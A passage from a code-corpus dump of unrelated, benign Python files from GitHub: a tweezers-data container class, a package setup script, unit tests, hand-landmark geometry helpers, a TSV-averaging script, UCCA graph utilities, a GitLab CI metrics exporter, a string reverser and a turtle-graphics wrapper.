However, if\n your data source does not implement a certain method, the code\n will fail only when the according property is called since all of them are evaluated lazily.\n\n\n Attributes:\n data (:class:`pandas.DataFrame`): experimental data\n analysis (:class:`collections.OrderedDict`): storage for analysis results\n segments (:class:`.IndexedOrderedDict`): segment data\n \"\"\"\n\n def __init__(self, source=None):\n \"\"\"\n Args:\n source (:class:`.BaseSource`): a data source object like e.g. :class:`.TxtBiotecSource`\n \"\"\"\n\n super().__init__()\n # store dataSource object\n if source:\n self.source = source\n else:\n self.source = None\n self.meta = MetaDict()\n self.units = UnitDict()\n # ToDo: check:\n self.analysis = OrderedDict()\n self.segments = IndexedOrderedDict()\n\n @lazy\n def data(self):\n \"\"\"\n Attribute that holds the experiment data. It is evaluated lazily thus the data is read only when required.\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n log.debug('Reading data from data source')\n data = self.source.getData()\n self.meta, self.units, data = self.source.postprocessData(self.meta, self.units, data)\n return data\n\n def addSegment(self, tmin, tmax, name=None):\n \"\"\"\n Add a segment with the given limits.\n\n Args:\n tmin (`float`): relative starting time of the segment\n tmax (`float`): relative end time of the segment\n name (`str`, optional): name (ID) of the segment, defaults to ``int(tmin)``\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n # create a standard name if none is given\n if not name:\n # converting to integer seconds might cause clashes, better option?\n name = '{:.0f}'.format(tmin)\n if name in self.segments.keys():\n log.warning('Segment key \"{}\" is being overridden'.format(name))\n\n # insert segment\n self.segments[name] = IndexedOrderedDict([('tmin', tmin), ('tmax', tmax)])\n # sort segments by name\n self.segments = self.segments.sorted()\n\n return self\n\n def deleteSegment(self, segId):\n \"\"\"\n Delete the segment with the given name or numeric index.\n\n Args:\n segId (`int` or `str`): name or numeric index of the segment to delete\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n self.segments.pop(segId)\n return self\n\n def getSegment(self, segId):\n \"\"\"\n Returns the segment with the given name or numeric index.\n\n Args:\n segId (`int` or `str`): name or numeric index of the segment to return\n\n Returns:\n :class:`.TweezersDataSegment`\n \"\"\"\n\n # check if segments are available\n if not self.segments:\n raise KeyError('No segments defined')\n\n return TweezersDataSegment(self, segId)\n\n\nclass TweezersDataSegment(TweezersDataBase):\n \"\"\"\n Class to hold the data of a data segment. 
Can be used in the same way as :class:`.TweezersData`.\n\n Attributes:\n data (:class:`pandas.DataFrame`): experimental data\n analysis (:class:`collections.OrderedDict`): storage for analysis results\n \"\"\"\n\n def __init__(self, tdInstance, segmentId):\n \"\"\"\n Args:\n tdInstance (:class:`.TweezersData`): instance to get the segment from\n segmentId (`int` or `str`): name or numeric index of the segment to return\n \"\"\"\n\n super().__init__()\n self.__dict__ = copy.deepcopy(tdInstance.__dict__)\n # get the proper key in case numeric indexing was used\n segmentId = self.segments.key(segmentId)\n self.segment = self.segments[segmentId]\n # get rid of the other segments\n del self.segments\n # update meta dict\n self.meta['segment'] = segmentId\n self.meta['id'] = '{} - {}'.format(self.meta['id'], segmentId)\n self.meta['idSafe'] = self.meta['id'].replace('_', ' ').replace('#', '')\n\n # check if data is already read into memory and use that if available\n if 'data' in self.__dict__:\n # adjust data\n queryStr = '{} <= time <= {}'.format(self.segment['tmin'], self.segment['tmax'])\n self.data = self.data.query(queryStr)\n self.data = self.data.reset_index(drop=True)\n self.data.loc[:, 'time'] -= self.data.loc[0, 'time']\n # delete avData if available\n try:\n self.__dict__.pop('avData')\n except KeyError:\n pass\n\n @lazy\n def data(self):\n \"\"\"\n Attribute that holds the experiment data. It is evaluated lazily thus the data is read only when required.\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n log.debug('Reading data from data source.')\n data = self.source.getDataSegment(self.segment['tmin'], self.segment['tmax'])\n self.meta, self.units, data = self.source.postprocessData(self.meta, self.units, data)\n return data\n","repo_name":"DollSimon/tweezers","sub_path":"tweezers/container/TweezersData.py","file_name":"TweezersData.py","file_ext":"py","file_size_in_byte":18679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"36708402064","text":"from setuptools import setup\n\nfrom pathlib import Path\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text(encoding=\"utf-8\")\nfrom Cython.Build import cythonize\n\nsetup(\n ext_modules=cythonize([\"WordNet/*.pyx\", \"WordNet/Similarity/*.pyx\"],\n compiler_directives={'language_level': \"3\"}),\n name='NlpToolkit-WordNet-Cy',\n version='1.0.13',\n packages=['WordNet', 'WordNet.Similarity', 'WordNet.data'],\n package_data={'WordNet': ['*.pxd', '*.pyx', '*.c', '*.py'],\n 'WordNet.Similarity': ['*.pxd', '*.pyx', '*.c'],\n 'WordNet.data': ['*.xml']},\n url='https://github.com/StarlangSoftware/TurkishWordNet-Cy',\n license='',\n author='olcay',\n author_email='olcay.yildiz@ozyegin.edu.tr',\n description='Turkish WordNet KeNet',\n install_requires=['NlpToolkit-MorphologicalAnalysis-Cy'],\n long_description=long_description,\n long_description_content_type='text/markdown'\n)\n","repo_name":"StarlangSoftware/TurkishWordNet-Cy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"12400149902","text":"from unittest import TestCase\nimport crud\nimport student\n\n\nclass TestFileRead(TestCase):\n def test_file_read_blank(self):\n crud.file_write([])\n self.assertEqual(0, len(crud.file_read()))\n\n def test_file_read(self):\n student_1 = student.Student(\"test\", \"test\", \"t11111111\", 
True, [])\n student_2 = student.Student(\"test\", \"test\", \"t22222222\", True, [])\n\n crud.file_write([student_1, student_2])\n students = crud.file_read()\n self.assertTrue(student_1.get_student_number() in students[0].get_student_number()\n and student_2.get_student_number() in students[1].get_student_number())\n crud.file_write([])\n","repo_name":"JoshuaShin/A01056181_1510_assignments","sub_path":"A4/test_file_read.py","file_name":"test_file_read.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"70510723898","text":"import collections\n\nimport numpy as np\nfrom numpy import typing as npt\nfrom scipy import spatial\nfrom scipy.spatial import distance\n\n__all__ = [\n \"compute_extend\",\n \"compute_distance_adjacency\",\n \"compute_hand_mean\",\n \"compute_hand_std\",\n \"compute_knuckle_direction\",\n \"compute_palm_direction\",\n \"compute_plane_shape_stats\",\n]\n\nAngleSummary = collections.namedtuple(\"AngleSummary\", \"xy yz xz\")\nPolygonStats = collections.namedtuple(\"PolygonStats\", \"area perimeter\")\nPlanes = collections.namedtuple(\"Planes\", \"xy yz xz\")\n\n\n# numpy batchable\ndef compute_extend(hand: npt.NDArray) -> tuple[float, float, float]:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n min_vals = np.min(hand, axis=0)\n max_vals = np.max(hand, axis=0)\n extend = np.abs(max_vals - min_vals)\n return tuple(extend)\n\n\n# numpy batchable\ndef compute_knuckle_direction(hand: npt.NDArray) -> tuple[float, float, float]:\n \"\"\"\n Knuckle direction as vector going from pinky knuckle to index knuckle.\n \"\"\"\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n index_knuckle = hand[5]\n pinky_knuckle = hand[17]\n\n knuckle_direction = index_knuckle - pinky_knuckle\n return tuple(knuckle_direction)\n\n\n# numpy batchable (??? 
depends on np.cross)\ndef compute_palm_direction(hand: npt.NDArray) -> tuple[float, float, float]:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n wrist = hand[0]\n index_knuckle = hand[5]\n pinky_knuckle = hand[17]\n\n # right hand rule 'a' vector\n wrist_index_direction = index_knuckle - wrist\n # right hasnd rule 'b' vector\n wrist_pinky_direction = pinky_knuckle - wrist\n\n # considering right hand rule\n # and given assumption that right hand was recorded\n # cross product direction is towards the camera if the inner side of the hand\n # points towards the camera too\n palm_direction = np.cross(wrist_index_direction, wrist_pinky_direction)\n return tuple(palm_direction)\n\n\ndef describe_angles(v1: npt.NDArray, v2: npt.NDArray) -> AngleSummary:\n if v1.shape != (3,) or v2.shape != (3,):\n raise ValueError(\"Vectors with incorrect shape.\")\n\n xy_ind = [0, 1]\n xz_ind = [0, 2]\n yz_ind = [1, 2]\n\n xy_angle = angle_between(v1[xy_ind], v2[xy_ind])\n xz_angle = angle_between(v1[xz_ind], v2[xz_ind])\n yz_angle = angle_between(v1[yz_ind], v2[yz_ind])\n return AngleSummary(xy_angle, yz_angle, xz_angle)\n\n\ndef compute_distance_adjacency(hand: npt.NDArray, dim: str = \"all\") -> npt.NDArray:\n dims = {\"all\": [0, 1, 2], \"x\": [0], \"y\": [1], \"z\": [2]}\n dim_indices = dims[dim]\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n return distance.cdist(hand[:, dim_indices], hand[dim_indices], metric=\"euclidean\")\n\n\n# numpy batchable\ndef compute_hand_mean(hand: npt.NDArray, part: str = \"all\") -> npt.NDArray:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n parts = {\n \"all\": list(range(21)),\n \"thumb\": [1, 2, 3, 4],\n \"index_finger\": [5, 6, 7, 8],\n \"middle_finger\": [9, 10, 11, 12],\n \"ring_finger\": [13, 14, 15, 16],\n \"pinky\": [17, 18, 19, 20],\n }\n indices = parts[part]\n return np.mean(hand[indices], axis=0)\n\n\n# numpy batchable\ndef compute_hand_std(hand: npt.NDArray, part: str = \"all\") -> npt.NDArray:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n parts = {\n \"all\": list(range(21)),\n \"thumb\": [1, 2, 3, 4],\n \"index_finger\": [5, 6, 7, 8],\n \"middle_finger\": [9, 10, 11, 12],\n \"ring_finger\": [13, 14, 15, 16],\n \"pinky\": [17, 18, 19, 20],\n }\n indices = parts[part]\n return np.std(hand[indices], axis=0)\n\n\ndef compute_polygon_stats(polygon: spatial.ConvexHull) -> PolygonStats:\n area = shoelace_formula(polygon.points[polygon.vertices])\n perimeter = polygon.area\n return PolygonStats(area, perimeter)\n\n\ndef compute_plane_shape_stats(hand: npt.NDArray) -> Planes[PolygonStats]:\n if hand.shape != (21, 3):\n raise ValueError(\"Incorrect landmark shape.\")\n\n stats_xy = compute_polygon_stats(spatial.ConvexHull(hand[:, :2]))\n stats_yz = compute_polygon_stats(spatial.ConvexHull(hand[:, 1:]))\n stats_xz = compute_polygon_stats(spatial.ConvexHull(hand[:, [0, 2]]))\n return Planes(stats_xy, stats_yz, stats_xz)\n\n\ndef unit_vector(vector: npt.NDArray) -> npt.NDArray:\n \"\"\"Returns the unit vector of the vector.\"\"\"\n return vector / np.linalg.norm(vector)\n\n\ndef angle_between(v1: npt.NDArray, v2: npt.NDArray) -> float:\n \"\"\"Returns the angle in radians between vectors 'v1' and 'v2'::\n\n Source: https://stackoverflow.com/a/13849249\n\n >>> angle_between((1, 0, 0), (0, 1, 0))\n 1.5707963267948966\n >>> angle_between((1, 0, 0), (1, 0, 0))\n 0.0\n >>> angle_between((1, 0, 0), (-1, 0, 0))\n 3.141592653589793\n \"\"\"\n 
v1_u = unit_vector(v1)\n v2_u = unit_vector(v2)\n return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))\n\n\ndef shoelace_formula(vertices: npt.NDArray) -> float:\n \"\"\"\n Compute the area of a 2D convex polygon using the shoelace formula.\n\n The shoelace formula calculates the area of a polygon by summing the products\n of the coordinates of adjacent vertices and then dividing by 2.\n\n Requirements:\n 1. Convexity: The polygon should be convex. For concave polygons, split them\n into multiple convex polygons for accurate results.\n 2. Vertex Order: Vertices must be specified in either clockwise or\n counterclockwise order.\n 3. Closed Polygon: Ensure that the first and last vertices of the array are\n the same to close the polygon.\n 4. Non-Self-Intersecting: The polygon should not have any self-intersections.\n 5. Non-Negative Area: The result will be positive if vertices are ordered\n counterclockwise, and negative if ordered clockwise. To ensure a positive\n result, order the vertices counterclockwise.\n 6. No Duplicates: Vertices should not contain duplicate points.\n\n Parameters:\n vertices (npt.NDArray): Array of shape [N x 2] representing the vertices\n of the polygon.\n\n Returns:\n float: Area of the convex polygon.\n\n Example:\n >>> polygon_vertices = np.array([[0, 0], [4, 0], [4, 3], [1, 2]])\n >>> area = shoelace_formula(polygon_vertices)\n >>> print(f\"The area of the polygon is {area}\")\n \"\"\"\n\n if vertices.shape[1] != 2:\n raise ValueError(\"Function only holds for 2D space.\")\n\n if vertices.shape[0] < 3:\n raise ValueError(\"A polygon must have at least three vertices.\")\n\n x = vertices[:, 0]\n y = vertices[:, 1]\n return 0.5 * np.abs(np.dot(x, np.roll(y, 1)) - np.dot(y, np.roll(x, 1)))\n","repo_name":"mniebisch/messy-stuff","sub_path":"hand_description.py","file_name":"hand_description.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"22812722955","text":"'''\nTHIS CODE WAS WRITTEN SPECIFICALLY FOR OUR D3D12 DXR PROJECT, IT MIGHT NOT WORK AS INTENDED IN OTHER CASES.\n\nHow to run this file:\nRun the file with the input folder as argument, this folder should contain three tsv files.\nEach of these files MUST have the same amount of rows and columns, along with two headers. 
The first header\nsome information about the system and the second should contain the number of objects tested in each column.\n\nAn output file will be generated in the input folder called \"averages.tsv\" and will contain the averages of the \nthree tsv files.\n'''\n\n\nimport csv, sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport os\n\ninput_map = sys.argv[1]\nfile_header = ''\n\noutput_file = input_map + \"/averages.tsv\"\n\n# Remove the output file if it previously exists (to simplify code)\nexists = os.path.isfile(output_file)\nif exists:\n os.remove(output_file)\n\n\nfiles = [f for f in listdir(input_map) if isfile(join(input_map, f))]\nnumFiles = len(files)\naverages = [0] * numFiles\ncurr_file_index = 0\n\nfor input_file in files:\n # Concatinate averages for TLAS, BLAS and VRAM\n with open(input_map + \"\\\\\" + input_file, newline='') as inf:\n # Initialize the reader\n reader = csv.reader(inf, delimiter='\\t')\n\n # Get the file header (probably same for all files)\n file_header = next(reader)\n file_header = file_header[0] + \" \" + file_header[1]\n first_row = next(reader)\n #print(f'Number of columns: {len(first_row) - 1}')\n\n numRows = 0\n averages[curr_file_index] = [0] * (len(first_row) - 3)\n # Iterate through all rows\n for row in reader:\n # Iterate through each value of the row\n for i in range(1, len(row) - 2):\n averages[curr_file_index][i - 1] += float(row[i])\n numRows += 1\n\n\n for i in range(0, len(averages[curr_file_index])):\n averages[curr_file_index][i] = averages[curr_file_index][i] / numRows\n #print(f'Num objects: {first_row[i + 1]} Average: {averages[curr_file_index][i]}')\n\n curr_file_index += 1\n\n\n#print(averages)\n\nwith open(output_file, \"w+\", newline='') as of:\n writer = csv.writer(of, delimiter='\\t')\n writer.writerow([file_header])\n file_names = [os.path.splitext(f)[0] for f in files]\n #print(file_names)\n column_headers = ['#'] + file_names\n writer.writerow(column_headers)\n \n for i in range(0, len(averages[0])):\n row = []\n row.append(first_row[i + 1])\n for j in range(0, numFiles):\n row.append(averages[j][i])\n writer.writerow(row)","repo_name":"Piratkopia13/DV2551_Project_DXR","sub_path":"Average_Data.py","file_name":"Average_Data.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"23"} +{"seq_id":"69933581179","text":"import sys\nimport os\n\nfrom get_edges_from_mrp import get_mrp_edges\n\n\ndef compress_chained_cs(edge_dict, chained_c_edges, coordinated_c_edges):\n for branch in chained_c_edges:\n for chain in branch:\n for other_chain in branch:\n if chain[-1] == other_chain[0] and chain != other_chain:\n new_chain = chain + other_chain[1:]\n branch.append(new_chain)\n branch.remove(chain)\n branch.remove(other_chain)\n for chain in branch:\n if len(chain) == 2:\n turn_from = chain[-1]\n turn_to = int(str(chain[0]) + '1111')\n edge_dict[(turn_to, turn_to)] = edge_dict[(chain)]\n del edge_dict[(chain)]\n for edge in list(edge_dict.keys()):\n #will throw bug if one node is shared by 2 C edges. 
Fix maybe in compress_c by removing altogether?\n for i,node in enumerate(edge):\n if node in chain:\n new_edge = list(edge)\n new_edge[i] = turn_to\n new_edge = tuple(new_edge)\n edge_dict[new_edge] = edge_dict[edge]\n del edge_dict[edge]\n elif len(chain) > 2:\n zipped = list(zip(chain, chain[1:]))\n for edge in list(edge_dict):\n if edge in zipped:\n del edge_dict[edge]\n else:\n for i, node in enumerate(edge):\n if node in chain:\n new_edge = list(edge)\n new_edge[i] = chain\n new_edge = tuple(new_edge)\n edge_dict[new_edge] = edge_dict[edge]\n del edge_dict[edge]\n for (u,v) in list(edge_dict.keys()):\n if str(u) == str(v):\n del edge_dict[(u,v)]\n return edge_dict\n\n\ndef chain_cs(edge_list):\n while any([element for element in edge_list if type(element) == tuple]):\n for edge in edge_list:\n if type(edge) == tuple:\n (u, v) = edge\n chains = []\n for element in edge_list:\n if type(element) == list:\n for (s, t) in element:\n if s == u or s == v or t == u or t == v:\n for (s, t) in element:\n chains.append((s,t))\n edge_list.remove(element)\n if len(chains) == 0:\n edge_list.append([(u,v)])\n edge_list.remove((u,v))\n else:\n chains.append((u,v))\n edge_list.remove((u,v))\n edge_list.append(chains)\n else:\n return edge_list\n\ndef compress_c_edge(edge_dict):\n '''\n input: dictionary of unprocessed edges in the format (source_node, target_node): label\n output: turns the nodeid into the node with the center edge and then flips all nodes around it\n however, it takes into account chained C's e.g. u -c-> v, v-c->w and doesn't try to compress those\n as well as coordination examples\n in the mappings dict, keep track of changes made to later be able to undo them. Format is\n {is_mapped_to_after_compression: was_mapped_to_before_compression}\n '''\n vanilla_c_edges = []\n chained_c_edges = []\n shared_cs = []\n coordinated_c_edges = []\n for (u, v) in edge_dict.keys():\n if edge_dict[(u, v)] == 'C':\n vanilla_c_edges.append((u, v))\n for (u, v) in vanilla_c_edges:\n for (s, t) in edge_dict.keys():\n #chained\n if (s == v or t ==u) and edge_dict[(s, t)] == \"C\":\n if (u, v) not in chained_c_edges:\n chained_c_edges.append((u,v))\n if (s, t) not in chained_c_edges:\n chained_c_edges.append((s,t))\n #coordination\n if s == u and t!=v and (edge_dict[(s, t)] =='N' or edge_dict[(s, t)] =='C'):\n if (u, v) not in coordinated_c_edges:\n coordinated_c_edges.append((u,v))\n if (s, t) not in coordinated_c_edges:\n coordinated_c_edges.append((s,t))\n #shared C's just skip for now\n if v == t and (edge_dict[(s,t)] =='C' and edge_dict[(u,v)] =='C' and u!= s):\n shared_cs.append((s,t))\n shared_cs.append((u,v))\n for (u,v) in shared_cs:\n if (u,v) in vanilla_c_edges:\n vanilla_c_edges.remove((u,v))\n if (u,v) in chained_c_edges:\n chained_c_edges.remove((u,v))\n chained_c_edges = list(set(chained_c_edges).difference(set(coordinated_c_edges)))\n vanilla_c_edges = list(set(vanilla_c_edges).difference(set(chained_c_edges).union(set(coordinated_c_edges))))\n for (u, v) in vanilla_c_edges:\n for (s, t) in list(edge_dict.keys()):\n if t == u:\n edge_dict[(s, v)] = edge_dict[(s, t)]\n del edge_dict[(s,t)]\n for (s, t) in list(edge_dict.keys()):\n if s== u:\n edge_dict[(v, t)] = edge_dict[(s, t)]\n del edge_dict[(s,t)]\n for (u, v) in list(edge_dict.keys()):\n if u == v:\n del edge_dict[(u, v)]\n chained_c_edges = chain_cs(chained_c_edges)\n edge_dict = compress_chained_cs(edge_dict, chained_c_edges, coordinated_c_edges)\n return edge_dict\n\ndef decompress_c(edge_dict, label_dict):\n '''\n decompresses 
the graphs by looking for a non-terminal with tell-tale outgoing edges\n that cannot exist without a center and then takes the source node as the center\n RETURNS\n _________\n uncompressed dicts, with similar surface structure as the original uncompressed edge dict\n but instead of the original names of the nodes, we use NONTERMINAL + counter as a node id\n '''\n #n = max([i for i in label_dict.keys() if type(i) == int and label_dict[i] == 'Non-Terminal'])\n labels = [label for label in label_dict.keys()]\n if len(labels) > 0:\n n = max(labels)\n else:\n n = 0\n contracted = []\n for (u,v) in list(edge_dict.keys()):\n if label_dict[u] != 'Non-Terminal':\n if u not in contracted:\n contracted.append(u)\n for node in contracted:\n n += 1\n if type(node) != tuple:\n for (u, v) in list(edge_dict.keys()):\n if v == node:\n edge_dict[u, n] = edge_dict[(u, v)]\n del edge_dict[(u, v)]\n edge_dict[(n, v)] = 'C'\n elif u == node:\n edge_dict[(n, v)] = edge_dict[(u, v)]\n del edge_dict[(u, v)]\n #IF BUG COMMENT OUT NEXT LINE\n edge_dict[(n, node)] = 'C'\n elif type(v) == tuple:\n uncontracted = list(zip(v, v[1:]))\n edge_dict[(u, v[0])] = edge_dict[(u,v)]\n del edge_dict[(u,v)]\n for (s, t) in list(edge_dict.keys()):\n if t == v and u != s:\n edge_dict[(s, t[0])] = edge_dict[(s,t)]\n del edge_dict[(s,t)]\n for edge in uncontracted:\n edge_dict[edge] = 'C'\n return edge_dict\n","repo_name":"coli-saar/am-parser","sub_path":"ucca/process_c.py","file_name":"process_c.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"23"} +{"seq_id":"10347201088","text":"\"\"\"\nsaveFileTester.py\nCode by Sammy Haq\nhttps://githhub.com/sammyhaq\n\nSimple driver code for testing out SaveFileHelper.py\n\n\"\"\"\n\nimport SaveFileHelper\n\n\ndef main():\n saver = SaveFileHelper.SaveFileHelper(\"testfile.txt\")\n saver.writeData(\"10\", \"20\", \"30\")\n saver.writeData(\"40\", \"50\", \"60\")\n saver.closeHelper()\n\n\nmain()\n","repo_name":"sammyhaq/gaitmate","sub_path":"pi/FileHelper/saveFileTester.py","file_name":"saveFileTester.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"13360052279","text":"import asyncio\nimport logging\nfrom datetime import datetime, timezone\nimport sys\nimport os\nfrom flask import Flask, Response\nfrom retry import retry\nfrom prometheus.exporter import PrometheusExporter, generate_latest\nfrom gitlabApi.gitlab import GitlabApiInteraction\n\n# Create Flask App\napp = Flask(__name__)\n# Create logger\nlog_format = \"%(asctime)s.%(msecs)03dZ [%(levelname)s] %(message)s\"\nlogging.basicConfig(\n stream=sys.stdout, level=logging.INFO, format=log_format, datefmt=\"%Y-%m-%dT%H:%M:%S\"\n)\nlogger = logging.getLogger(__name__)\n# Create Prometheus Exporter\nexporter = PrometheusExporter()\n# Create gitlab api interaction class\ngitlab_api_interaction = GitlabApiInteraction()\ngroup_id = os.environ.get(\"GROUP_ID\")\nlast_fetch_time = None\n\nlogger.info(\"Process initialized\")\n\n\n# Metrics Define and Initialized\ndef init_metrics():\n # pipeline level\n exporter.add_gauge_metric(\n \"gitlab_pipeline_duration_seconds\",\n \"Duration of GitLab pipeline in seconds\",\n [\"group_id\", \"path_with_namespace\", \"pipeline_id\", \"source\", \"ref\", \"status\"],\n )\n exporter.add_gauge_metric(\n \"gitlab_pipeline_queued_duration_seconds\",\n \"Queued duration of GitLab pipeline in seconds\",\n [\"group_id\", 
\"path_with_namespace\", \"pipeline_id\", \"source\", \"ref\", \"status\"],\n )\n exporter.add_counter_metric(\n \"gitlab_pipeline_executed_counts\",\n \"Executed counts of GitLab pipeline\",\n [\"group_id\", \"path_with_namespace\", \"pipeline_id\", \"source\", \"ref\", \"status\"],\n )\n # job level\n exporter.add_gauge_metric(\n \"gitlab_job_duration_seconds\",\n \"Duration of GitLab job in seconds\",\n [\n \"group_id\",\n \"runner_description\",\n \"job_id\",\n \"job_name\",\n \"path_with_namespace\",\n \"source\",\n \"pipeline_id\",\n \"ref\",\n \"status\",\n ],\n )\n exporter.add_gauge_metric(\n \"gitlab_job_queued_duration_seconds\",\n \"Queued duration of GitLab job in seconds\",\n [\n \"group_id\",\n \"runner_description\",\n \"job_id\",\n \"job_name\",\n \"path_with_namespace\",\n \"source\",\n \"pipeline_id\",\n \"ref\",\n \"status\",\n ],\n )\n exporter.add_counter_metric(\n \"gitlab_job_executed_counts\",\n \"Executed counts of GitLab job\",\n [\n \"group_id\",\n \"runner_description\",\n \"job_id\",\n \"job_name\",\n \"path_with_namespace\",\n \"source\",\n \"pipeline_id\",\n \"ref\",\n \"status\",\n ],\n )\n\n# Fetch pipelines for all projects in specific group\n@retry(exceptions=Exception, tries=3, delay=1, backoff=2)\nasync def fetch_project_pipelines(start_time, end_time):\n try:\n all_pipelines = {}\n projects = await gitlab_api_interaction.get_subgroup_projects(group_id)\n pipelines = await gitlab_api_interaction.select_pipelines_for_execution(\n projects, start_time, end_time\n )\n if pipelines is not None:\n all_pipelines.update(pipelines)\n else:\n logger.info(\"No pipelines to update\")\n return all_pipelines\n except Exception as e:\n logger.error(f\"Error occurred: {e}\")\n\n\n# Fetch Jobs for all runber manager in specific group\n@retry(exceptions=Exception, tries=3, delay=1, backoff=2)\nasync def fetch_runner_jobs(start_time, end_time):\n try:\n jobs = await gitlab_api_interaction.select_jobs_for_execution(\n group_id, start_time, end_time\n )\n\n return jobs\n except Exception as e:\n logger.error(f\"Error occurred: {e}\")\n\n\n# insert metrics to default registry\nasync def collect_metrics(records, record_type):\n if not records:\n logger.info(f\"No {record_type} to collect\")\n return\n for _, record_attr in records.items():\n try:\n record_attr[\"duration\"] = record_attr[\"duration\"]\n record_attr[\"queued_duration\"] = record_attr[\"queued_duration\"]\n labels = record_attr.copy()\n del labels[\"duration\"]\n del labels[\"queued_duration\"]\n exporter.set_metric(\n f\"gitlab_{record_type}_duration_seconds\",\n labels,\n record_attr[\"duration\"],\n )\n exporter.set_metric(\n f\"gitlab_{record_type}_queued_duration_seconds\",\n labels,\n record_attr[\"queued_duration\"],\n )\n exporter.increment_metric(f\"gitlab_{record_type}_executed_counts\", labels)\n except Exception as e:\n logger.error(f\"Error occurred: {e}\")\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n return \"Ok\", 200\n\n\n@app.route(\"/metrics\", methods=[\"GET\"])\ndef expose_metrics():\n try:\n metrics_data = generate_latest()\n response = Response(metrics_data, mimetype=\"text/plain\")\n exporter.clear_metrics()\n return response\n except Exception as e:\n error_message = f\"Error occurred while exposing metrics: {e}\"\n logger.error(error_message)\n\n\nasync def start_fetch():\n while True:\n global last_fetch_time\n\n if last_fetch_time is None:\n start_time = datetime.now(timezone.utc).strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n start_time = datetime.strptime(start_time, 
\"%Y-%m-%dT%H:%M:%S.%fZ\")\n else:\n start_time = last_fetch_time\n logger.info(\"start_time: %s\", start_time)\n\n end_time = datetime.now(timezone.utc).strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n end_time = datetime.strptime(end_time, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n logger.info(f\"end_time: {end_time}\")\n\n last_fetch_time = end_time\n # fetch pipelines and jobs\n pipelines = await fetch_project_pipelines(start_time, end_time)\n jobs = await fetch_runner_jobs(start_time, end_time)\n # collect jobs and pipelines metrics\n await collect_metrics(pipelines, \"pipeline\")\n await collect_metrics(jobs, \"job\")\n # reset gitlab class after finishing one fetch\n gitlab_api_interaction.reset_init()\n\n@retry(exceptions=Exception, tries=3, delay=1, backoff=2)\ndef run_application(): \n try:\n loop = asyncio.get_event_loop()\n asyncio_task = loop.create_task(start_fetch())\n app_task = loop.run_in_executor(None, app.run, \"0.0.0.0\", 8000)\n loop.run_until_complete(asyncio.gather(asyncio_task, app_task))\n except Exception as e:\n logging.error(f\"Error occurred: {e}\")\n\n\nif __name__ == \"__main__\":\n init_metrics()\n run_application()\n","repo_name":"Andy0223/gitlab-ci-monitoring-exporter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"44160073372","text":"# переворачивает строку, сохраняя позицию пунктуации\ndef reverse_on_punctuation(original_string):\n copy_of_original = original_string[:] + '\\0' # для отслеживания конца строки\n string_of_letters = []\n result = []\n for symbol in copy_of_original:\n if symbol.isalpha(): # формируем слово\n string_of_letters.append(symbol) # добавляем в слово\n elif not symbol.isalpha() or symbol == '\\0': # добавляем слово в резалт\n reversed_word = ''.join(string_of_letters[::-1]) # переворачиваем слово,\n result.append(reversed_word + symbol) # добавляем в резалт вместе с пунктуацией\n string_of_letters = []\n result = ''.join(result)\n return result[:-1] # без '\\0'\n\n\nmessage = input(\"Сообщение: \").split()\nnew_message = []\n\nfor word in message:\n if word.isalpha(): # не содержит пунктуации\n new_message.append(word[::-1]) # переворачиваем строку\n else: # содержит пунктуацию\n revered_word = reverse_on_punctuation(word) # переворачиваем строку с учетом пунктуации\n new_message.append(revered_word)\n\nnew_message = ' '.join(new_message)\n\nprint(\"\\nНовое сообщение:\", new_message)\n\n","repo_name":"Sergei-V-Fedorov/python-basic","sub_path":"Module18/09_message/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"8054234324","text":"from pyscript import document, window\n\nclass Turtle:\n def __init__(self):\n canvas = document.createElement(\"canvas\")\n canvas.id = \"canvas\"\n document.body.prepend(canvas)\n self.turtle = window.getTurtle(\"canvas\")\n\n async def forward(self, distance):\n await self.turtle.forward(distance)\n\n async def backward(self, distance):\n await self.turtle.backward(distance)\n\n async def left(self, angle):\n await self.turtle.left(angle)\n\n async def right(self, angle):\n await self.turtle.right(angle)\n\n async def goto(self, x, y):\n await self.turtle.goto(x, y)\n\n async def circle(self, radius):\n await self.turtle.circle(radius, 360)\n\n async def width(self, width):\n self.turtle.width(width)\n\n async def color(self, *args):\n 
